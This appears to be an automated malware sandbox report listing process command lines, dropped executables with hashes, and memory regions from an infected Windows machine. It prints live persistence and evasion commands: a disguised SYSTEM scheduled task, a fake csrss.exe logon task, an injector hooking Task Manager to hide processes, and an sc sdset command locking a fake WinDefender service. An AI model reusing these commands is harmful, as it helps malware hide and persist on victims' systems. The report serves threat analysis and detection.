C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start wuauserv

Network


Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

MD5 45a3bb26ea6be74edc125030beeef437
SHA1 366fe6443678f62e564919e1b0043f8a3d4072d2
SHA256 3d426ba7313007978b404b0a54ac66c53d62a851b9992e5b53e8b21f5e0dcc12
SHA512 470b71f2a97ae47b6e5fbc717b4df2bac37882890be99e3ced126104747f9d601fe62202cd00989e0e13e689e107030a9a60edc23e176ec9c97e67abc756d320

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

MD5 45a3bb26ea6be74edc125030beeef437
SHA1 366fe6443678f62e564919e1b0043f8a3d4072d2
SHA256 3d426ba7313007978b404b0a54ac66c53d62a851b9992e5b53e8b21f5e0dcc12
SHA512 470b71f2a97ae47b6e5fbc717b4df2bac37882890be99e3ced126104747f9d601fe62202cd00989e0e13e689e107030a9a60edc23e176ec9c97e67abc756d320

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

MD5 7e93bacbbc33e6652e147e7fe07572a0
SHA1 421a7167da01c8da4dc4d5234ca3dd84e319e762
SHA256 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38
SHA512 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

MD5 7e93bacbbc33e6652e147e7fe07572a0
SHA1 421a7167da01c8da4dc4d5234ca3dd84e319e762
SHA256 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38
SHA512 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

memory/3368-14-0x0000000000470000-0x000000000047A000-memory.dmp

memory/3368-15-0x00007FFF25E90000-0x00007FFF26951000-memory.dmp

memory/3368-17-0x00007FFF25E90000-0x00007FFF26951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

MD5 74f145f1bc8fe95013f30cff035aef28
SHA1 c1e73bf94b6a8bdb8e133a9cf69ad02895b222a6
SHA256 4938bb8c9f1cf0f55c3e555b816632eb84a1e2cef0b08548f53400f43ede38c1
SHA512 1792c711d1670838bac98f332a38bd70064cfac5324e216143127450cdb915b1fba5b07d201a82a7d16c444428d72014707883b86275e868a166d0e4f640c008

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

MD5 74f145f1bc8fe95013f30cff035aef28
SHA1 c1e73bf94b6a8bdb8e133a9cf69ad02895b222a6
SHA256 4938bb8c9f1cf0f55c3e555b816632eb84a1e2cef0b08548f53400f43ede38c1
SHA512 1792c711d1670838bac98f332a38bd70064cfac5324e216143127450cdb915b1fba5b07d201a82a7d16c444428d72014707883b86275e868a166d0e4f640c008

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

MD5 74f145f1bc8fe95013f30cff035aef28
SHA1 c1e73bf94b6a8bdb8e133a9cf69ad02895b222a6
SHA256 4938bb8c9f1cf0f55c3e555b816632eb84a1e2cef0b08548f53400f43ede38c1
SHA512 1792c711d1670838bac98f332a38bd70064cfac5324e216143127450cdb915b1fba5b07d201a82a7d16c444428d72014707883b86275e868a166d0e4f640c008

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

MD5 74f145f1bc8fe95013f30cff035aef28
SHA1 c1e73bf94b6a8bdb8e133a9cf69ad02895b222a6
SHA256 4938bb8c9f1cf0f55c3e555b816632eb84a1e2cef0b08548f53400f43ede38c1
SHA512 1792c711d1670838bac98f332a38bd70064cfac5324e216143127450cdb915b1fba5b07d201a82a7d16c444428d72014707883b86275e868a166d0e4f640c008

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

MD5 74f145f1bc8fe95013f30cff035aef28
SHA1 c1e73bf94b6a8bdb8e133a9cf69ad02895b222a6
SHA256 4938bb8c9f1cf0f55c3e555b816632eb84a1e2cef0b08548f53400f43ede38c1
SHA512 1792c711d1670838bac98f332a38bd70064cfac5324e216143127450cdb915b1fba5b07d201a82a7d16c444428d72014707883b86275e868a166d0e4f640c008

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

MD5 2e0f97ae1bcad17088b12bfec0dea44e
SHA1 c6b90f19a2a9ee2602106e35bbb03f5fb71b78e6
SHA256 decd8291a1f383677b50935b429110f0978b4d248b86a0e5bf4fe62355f3ef06
SHA512 4f1cbb5a84c9c867e4c4ca0f984351b08549299496368c042672a15b59d3320750f99c444ce55263653158bb997e88960b17c2360f89bab66c2d4dd2b6c8449b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

MD5 2e0f97ae1bcad17088b12bfec0dea44e
SHA1 c6b90f19a2a9ee2602106e35bbb03f5fb71b78e6
SHA256 decd8291a1f383677b50935b429110f0978b4d248b86a0e5bf4fe62355f3ef06
SHA512 4f1cbb5a84c9c867e4c4ca0f984351b08549299496368c042672a15b59d3320750f99c444ce55263653158bb997e88960b17c2360f89bab66c2d4dd2b6c8449b

memory/756-33-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3096-35-0x0000000002EA0000-0x0000000002EB6000-memory.dmp

memory/756-36-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\74E.exe

MD5 5f81e1979a36b1f59bbce2a8f3b73b1e
SHA1 ebe80b6c8dd9b1c0b2b1df225d778770e2215b10
SHA256 d746e63f4b6fb2dc67200fecd7949b59d0e2ffa1be14abdefee89f54e3c653ab
SHA512 bd9dd00920f0e8e8d96626cec3cb0fc1494315c05f11ea74b2268c74134123f5b91572bb2728e50e606be4503e8abc5e9531b7239850aaaf5b4b340f9c88d0e9

C:\Users\Admin\AppData\Local\Temp\74E.exe

MD5 5f81e1979a36b1f59bbce2a8f3b73b1e
SHA1 ebe80b6c8dd9b1c0b2b1df225d778770e2215b10
SHA256 d746e63f4b6fb2dc67200fecd7949b59d0e2ffa1be14abdefee89f54e3c653ab
SHA512 bd9dd00920f0e8e8d96626cec3cb0fc1494315c05f11ea74b2268c74134123f5b91572bb2728e50e606be4503e8abc5e9531b7239850aaaf5b4b340f9c88d0e9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

MD5 4140b043e42533ddc671f25de1e46973
SHA1 9508898e1e6e2a5d865008a1619ff23ed570202a
SHA256 1e956fc162b7e68c0177d7049943a6c0410306ef91e4dd915b0e92df86142acc
SHA512 bd097de2f2948427a39a26537ab9f9b791eddb7d8f4ce8ec255f189f6a0c5460c4b4fc8e3a6532c9b2b0d6ceba66b04ce2bea305ad88e592ad64208135c4dd8c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

MD5 4140b043e42533ddc671f25de1e46973
SHA1 9508898e1e6e2a5d865008a1619ff23ed570202a
SHA256 1e956fc162b7e68c0177d7049943a6c0410306ef91e4dd915b0e92df86142acc
SHA512 bd097de2f2948427a39a26537ab9f9b791eddb7d8f4ce8ec255f189f6a0c5460c4b4fc8e3a6532c9b2b0d6ceba66b04ce2bea305ad88e592ad64208135c4dd8c

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

MD5 9a94ba46fa8626bbc10c825054a92de8
SHA1 d7ea7d93156b3b5c3c3281881587f77469534ece
SHA256 02c4eb8f9ef5b6184c4b0f4fbfc82ed9cb1c513191d9fbd68fc84c8ef0cdb146
SHA512 ce0518a18e8378dcedd381d50ed6a9282a1599d974e7f9e188417a8bb05fb82286a54ffcc8c477a082af7b67998c9c1fe78812e22cb0c3bc0084885c56218336

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

MD5 9a94ba46fa8626bbc10c825054a92de8
SHA1 d7ea7d93156b3b5c3c3281881587f77469534ece
SHA256 02c4eb8f9ef5b6184c4b0f4fbfc82ed9cb1c513191d9fbd68fc84c8ef0cdb146
SHA512 ce0518a18e8378dcedd381d50ed6a9282a1599d974e7f9e188417a8bb05fb82286a54ffcc8c477a082af7b67998c9c1fe78812e22cb0c3bc0084885c56218336

C:\Users\Admin\AppData\Local\Temp\943.bat

MD5 e79bae3b03e1bff746f952a0366e73ba
SHA1 5f547786c869ce7abc049869182283fa09f38b1d
SHA256 900e53f17f7c9a2753107b69c30869343612c1be7281115f3f78d17404af5f63
SHA512 c67a9a5a366be8383ad5b746c54697c71dbda712397029bc8346b7c52dd71a7d41be3d35159de35c44a3b8755d9ce94acda08d12ff105263559adb6a6d0baf50

C:\Users\Admin\AppData\Local\Temp\A4E.exe

MD5 286aba392f51f92a8ed50499f25a03df
SHA1 ee11fb0150309ec2923ce3ab2faa4e118c960d46
SHA256 ecf04cf957e7653f20ef2d0d73b63040620a6e36a53605ab2242cbef40f7fb22
SHA512 84e1535026a4fce44bb662a21221ca295a9f894b0bd2a03e1e5720f6c9734d849f7fe5f997c14badc520ddd0b5bd507f49556a432b6ccd8e4c73d34a0a17421c

C:\Users\Admin\AppData\Local\Temp\A4E.exe

MD5 286aba392f51f92a8ed50499f25a03df
SHA1 ee11fb0150309ec2923ce3ab2faa4e118c960d46
SHA256 ecf04cf957e7653f20ef2d0d73b63040620a6e36a53605ab2242cbef40f7fb22
SHA512 84e1535026a4fce44bb662a21221ca295a9f894b0bd2a03e1e5720f6c9734d849f7fe5f997c14badc520ddd0b5bd507f49556a432b6ccd8e4c73d34a0a17421c

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

MD5 16a919b3c11486d4732d294b73a2e08a
SHA1 d481f00b71594fa25fa0085ccf1e3a3e1c013424
SHA256 7ae90b2e09f4f0ea766be3ce4ee89bac2964b6f3acc3a3f806573085491a2461
SHA512 0f1a5818779df0ee1c0bd7cdc79e667d0d0a1be09f6d8ce82a76fe3fb4ef9855698a07fc26e2411a0f831bc44d92da81c619d323f1d621fa82e4b678f14136d3

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

MD5 16a919b3c11486d4732d294b73a2e08a
SHA1 d481f00b71594fa25fa0085ccf1e3a3e1c013424
SHA256 7ae90b2e09f4f0ea766be3ce4ee89bac2964b6f3acc3a3f806573085491a2461
SHA512 0f1a5818779df0ee1c0bd7cdc79e667d0d0a1be09f6d8ce82a76fe3fb4ef9855698a07fc26e2411a0f831bc44d92da81c619d323f1d621fa82e4b678f14136d3

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

MD5 dde502654f3c9914ddede06ea312a275
SHA1 9b96ae25ad4983617028b4a3af03093c46ae72c8
SHA256 ae701c0ebf108b5f681f098378c9fc381d325d1979cec9221c1db40ef1fa29cf
SHA512 09947f60b6375e0f8f9f6da610f8373625add199f4175c5b4005d7cfaccf1ba142fc2769d5d96aa960cf3c23c0a2181839c183b226b5d550e353c0dd2ddeeed7

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

MD5 dde502654f3c9914ddede06ea312a275
SHA1 9b96ae25ad4983617028b4a3af03093c46ae72c8
SHA256 ae701c0ebf108b5f681f098378c9fc381d325d1979cec9221c1db40ef1fa29cf
SHA512 09947f60b6375e0f8f9f6da610f8373625add199f4175c5b4005d7cfaccf1ba142fc2769d5d96aa960cf3c23c0a2181839c183b226b5d550e353c0dd2ddeeed7

C:\Users\Admin\AppData\Local\Temp\B58.exe

MD5 1aba285cb98a366dc4be21585eecd62a
SHA1 c6f97ddd38231287ca6a9bb3cf3b5eefb0bf9b9b
SHA256 ffa9f51e3c68fedcd1d07567206d777456ae6dd12b9540c11ad45c36adfa32a8
SHA512 9fa385f257b974ab16b5b52af89fb3867b49a5ddcf02a11449b1557293ef870a9c31e3da33fad5898b568356266ffac5b3d80881bd981d354311cbcd7a75b439

C:\Users\Admin\AppData\Local\Temp\B58.exe

MD5 1aba285cb98a366dc4be21585eecd62a
SHA1 c6f97ddd38231287ca6a9bb3cf3b5eefb0bf9b9b
SHA256 ffa9f51e3c68fedcd1d07567206d777456ae6dd12b9540c11ad45c36adfa32a8
SHA512 9fa385f257b974ab16b5b52af89fb3867b49a5ddcf02a11449b1557293ef870a9c31e3da33fad5898b568356266ffac5b3d80881bd981d354311cbcd7a75b439

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

MD5 64309252cd2b9cd86db027a1d455ccf8
SHA1 8c0048a67f6fc9cdfe27d1e11ec6337a26b12639
SHA256 d6bbd0ed0c114d616d20cb595ca35379c33865d5f7238730fa5e46db7d9443b5
SHA512 d9f3384544b1502d363c173639ff0c9ad0d77cf0b56c19fbdf78ba9c4d95cf1172d9d45d1fd61bedc0d025f95d56a124fd783d206e51f61743c6a4baf73d51c4

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

MD5 64309252cd2b9cd86db027a1d455ccf8
SHA1 8c0048a67f6fc9cdfe27d1e11ec6337a26b12639
SHA256 d6bbd0ed0c114d616d20cb595ca35379c33865d5f7238730fa5e46db7d9443b5
SHA512 d9f3384544b1502d363c173639ff0c9ad0d77cf0b56c19fbdf78ba9c4d95cf1172d9d45d1fd61bedc0d025f95d56a124fd783d206e51f61743c6a4baf73d51c4

memory/4036-90-0x0000000000850000-0x000000000088C000-memory.dmp

memory/4036-91-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/668-93-0x0000000000400000-0x0000000000433000-memory.dmp

memory/668-94-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4036-97-0x0000000007D80000-0x0000000008324000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

MD5 25f94f03de983acc6c7b701895dd1b4e
SHA1 0d9c0f168e3b0f886115601ff563544fbf197932
SHA256 0ac1c19b1c2efff03343f5dea9f6c3cfb5cacab05a1ab82ad4d3ab71056df3f3
SHA512 f776f0f0924323d7962a6df86b6dd73ce6f98fbc7b514d17fcf2c59ee39bcab63d357af4d324352e9a19a512479de63952fb01efd04f8e4877c79baeb0054f6e

memory/2216-102-0x0000000000350000-0x000000000038C000-memory.dmp

memory/2216-103-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/4036-104-0x0000000007980000-0x0000000007990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

MD5 25f94f03de983acc6c7b701895dd1b4e
SHA1 0d9c0f168e3b0f886115601ff563544fbf197932
SHA256 0ac1c19b1c2efff03343f5dea9f6c3cfb5cacab05a1ab82ad4d3ab71056df3f3
SHA512 f776f0f0924323d7962a6df86b6dd73ce6f98fbc7b514d17fcf2c59ee39bcab63d357af4d324352e9a19a512479de63952fb01efd04f8e4877c79baeb0054f6e

memory/4036-99-0x00000000077D0000-0x0000000007862000-memory.dmp

memory/668-96-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4036-105-0x00000000053D0000-0x00000000053DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 777424efaa0b7dc4020fed63a05319cf
SHA1 f4ff37d51b7dd7a46606762c1531644b8fbc99c7
SHA256 30d13502553b37ca0221b08f834e49be44ba9b9c2bbb032dded6e3ab3f0480d5
SHA512 7e61eab7b512ac99d2c5a5c4140bf0e27e638eb02235cd32364f0d43ee0784e2d8ac212d06a082c1dce9f61c63b507cb8feb17efffbd1954b617208740f72ad9

memory/2216-109-0x0000000007250000-0x0000000007260000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

memory/2216-120-0x00000000081F0000-0x0000000008808000-memory.dmp

memory/4036-121-0x0000000007B90000-0x0000000007C9A000-memory.dmp

memory/4036-122-0x00000000078D0000-0x00000000078E2000-memory.dmp

memory/2216-123-0x0000000007420000-0x000000000745C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

memory/2216-124-0x0000000007460000-0x00000000074AC000-memory.dmp

memory/668-92-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

\??\pipe\LOCAL\crashpad_4964_XEHRSQLKZERYOETQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d7fd1f2239521a365723430b95342d87
SHA1 1e589564cc1b38f98e2c1a0fda4ca07af0d485bb
SHA256 a5f98cc89035eada405bfbf1c0f4c3f38edc9f431b93c905494f965a3cc7be99
SHA512 fd6c978b26f7df7a0d3740ab083ee2d9c7cb9a3a3c0b3805900e1e81fa838ad14790c8e425e64f478f0211491b2dd5ddae501a865c703564385916acfd112976

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 78ae929cad6cc0d97120dbe666b7398d
SHA1 ed8a6f258575085a9828e78cd4c15b3492341d92
SHA256 e859bf6db0c1be6443f3e631a5d20fb47210b5a141d6ca21aceaed75d97707c7
SHA512 ce14b511d01f2860d3605c0cbaa8c22187591d052155e933420eaa7010755eab0c9dbaa0f22d3b11a6a19b578e1081093eb4d79ab3485798f0ba70cdd05867d0

\??\pipe\LOCAL\crashpad_3412_CVNNVVQTYUOAULFG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 483924abaaa7ce1345acd8547cfe77f4
SHA1 4190d880b95d9506385087d6c2f5434f0e9f63e8
SHA256 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684
SHA512 e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

memory/4036-222-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/2216-235-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3528.exe

MD5 699c65fed2ca6370f86d5da5f70ee9c2
SHA1 f27c46e0e5bf076326392f0f4e1976f8ecd6db35
SHA256 f24d47bd9cc9daa71c869a1d06551801395ba2bbbff0c33a102e79d32c0a630d
SHA512 87c847e190fbac40ccc8a21c16ab120a74c71b1d157137935c8305725715f14b76b823e098b1d44b6b94b040183c2a76f9a6bfe0788ce19eee7866c2936e9692

memory/968-243-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 e7c9d67cd6c147c72e072deae66f4af0
SHA1 4c1e8ee19f2df4419a23d1739cf17127f96f32e3
SHA256 4d3b55734c4943f87a6ce7b34278e17e2789352d7081c57476ec8caff563e555
SHA512 aa9942cbb546f649bd7e6b34cd9f2afa3a63bdf0a792aafcabe22f455c04cd23b370381344b52aabb3d37e51237eb90e940ee96077b5b9d507d0f3d657d17ecd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ea678f84a1a07269607200111cab0632
SHA1 bb473d441a65f7ac612a598de07201a19437ee68
SHA256 838585de53bd98d92ff4ca18f140631da551184a243a7b3a2d59da4a336ad7f0
SHA512 c2f63001f4dc5c81fb8b0377ce9b20f6c88c74a20be50be597261ec6a8f6b8438a895b5b838c71703f7b8c57b6a738f55a439bfdb825a9803d3b292e3b762a32

memory/968-272-0x0000000000C70000-0x0000000001904000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 3914ab14b490e1bb3ffd5abed9601ee7
SHA1 038c41a2117ff9c6e0527e551faa1c054767514e
SHA256 c99fb7d702774c3e49a67c35f0099f79e66c2af4855df822acbe3e9e018093a7
SHA512 11b61847962d2562c23a870a1f267ea81e9ced9ee4b75f022eac757a7cdae9b3d2c4409b1aa8bef2a202a809e2bbf4384caa7659e713d23ffc2600a8e7c06ff8

memory/4036-277-0x0000000007980000-0x0000000007990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3CDA.exe

MD5 ed1e95debacead7bec24779f6549744a
SHA1 d1becd6ca86765f9e82c40d8f698c07854b32a45
SHA256 e9955f64d2e3579dc9d2edf2b75a4c272738f3d78d05b16ebfa7632cc1d89651
SHA512 32ddac199c036567fa4e7d10775951a62b64f562b9afba9462c5a3bf333caa92462c036655d1b9ba9dbd961a628f6314455f812817ecbc8a49cbc8c807db9c84

C:\Users\Admin\AppData\Local\Temp\3EDF.exe

MD5 0592c6d7674c77b053080c5b6e79fdcb
SHA1 693339ede19093e2b4593fda93be0b140be69141
SHA256 fe19cdb149ecd8fd116f048852dcc10e46a3521351102685ce25c61a7d962a14
SHA512 37f2ff110b0702229b888280c8c2dff7885e6b1e583ccc47c36e74f44adfa491f70d6d6ab95d79149437d6fd9400448f1046eee3676ea98dffe99bc28e4783cb

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 032a919dff4e6ba21c24d11a423b112c
SHA1 cbaa859c0afa6b4c0d2a288728e653e324e80e90
SHA256 12654cd367670f7f16dfd08210e2d704b777fcdd54a76a0c6e9925f588161553
SHA512 0c9edc1ef763cdcd3a5821644c23bb833b4b7080a9715fa58bd91f4b5a4ab98548c3c195835ed547264d22359dc4f341e758d5588d1d2ede1ef6bebd5df0785c

memory/2216-302-0x0000000007250000-0x0000000007260000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 020ad283a781f7ff82b32ca785d890e4
SHA1 6c0dfa83de61c67bddef5d35ddefac9eacf60dc3
SHA256 9532da8b4316e7ece17b4c4a4b7284f5438c91bf0c4ff9c73aabeabd10436629
